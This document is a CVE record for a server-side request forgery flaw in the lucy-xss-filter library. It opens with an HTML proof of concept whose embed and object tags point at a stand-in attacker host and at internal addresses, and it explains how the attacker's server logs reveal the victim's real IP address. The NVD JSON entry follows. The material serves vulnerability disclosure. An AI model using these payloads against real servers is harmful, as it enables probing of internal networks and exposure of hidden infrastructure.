CVE-2026-23768

<!-- CVE-2026-23768 PoC - Server-Side Request Induction in lucy-xss-filter --> <!-- This PoC demonstrates how an attacker can induce HEAD requests to arbitrary URLs --> <!-- when ObjectSecurityListener or EmbedSecurityListener is enabled --> <!-- Method 1: Using embed tag with src attribute missing file extension --> <html> <body> <h1>CVE-2026-23768 PoC</h1> <p>Target application uses lucy-xss-filter with security listeners enabled.</p> <!-- This payload will induce the server to send a HEAD request to attacker.com --> <embed src="http://attacker.com/probe"> <!-- Method 2: Using object tag with data attribute missing file extension --> <object data="http://attacker.com/internal-api"> <!-- Method 3: Using embed tag pointing to internal network --> <embed src="http://192.168.1.1/admin"> <!-- Method 4: Using object tag with internal hostname --> <object data="http://internal.corp.local/secrets"> <!-- Example server-side code vulnerable to this issue (Java): --> /* String userInput = request.getParameter("content"); StringSecurityConfig config = StringSecurityConfig.getDefaultConfig(); config.setEnabledSecurityListener( List.of( new ObjectSecurityListener(), // ENABLED - vulnerable new EmbedSecurityListener() // ENABLED - vulnerable ) ); // This will trigger HEAD requests for URLs without extensions String sanitized = LucyXssFilter.getInstance().doFilter(userInput); */ <!-- Attacker-controlled server log analysis: --> /* # Attacker server (attacker.com) receives HEAD requests from victim server # This reveals: # 1. Victim server's real IP address (bypassing CDN/proxy) # 2. Internal network structure if internal URLs are used # 3. Active services and endpoints # Example log: # 192.168.x.x - - [timestamp] "HEAD /probe HTTP/1.1" 200 - "-" "Java/1.8.0_xxx" # This IP could be an internal address, revealing network topology */ </html>

{"cve": {"id": "CVE-2026-23768", "sourceIdentifier": "[email protected]", "published": "2026-01-16T06:15:51.333", "lastModified": "2026-01-23T17:26:59.110", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "lucy-xss-filter before commit 7c1de6d allows an attacker to induce server-side HEAD requests to arbitrary URLs when the ObjectSecurityListener or EmbedSecurityListener option is enabled and embed or object tags are used with a src attribute missing a file extension."}, {"lang": "es", "value": "lucy-xss-filter antes del commit 7c1de6d permite a un atacante inducir solicitudes HEAD del lado del servidor a URLs arbitrarias cuando la opción ObjectSecurityListener o EmbedSecurityListener está habilitada y se utilizan etiquetas embed u object con un atributo src al que le falta una extensión de archivo."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:naver:lucy-xss-filter:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-06-08", "matchCriteriaId": "EE152946-8B7E-490F-986A-D584F6CC5D4D"}]}]}], "references": [{"url": "https://cve.naver.com/detail/cve-2026-23768.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/naver/lucy-xss-filter/pull/31", "source": "[email protected]", "tags": ["Exploit", "Patch"]}]}}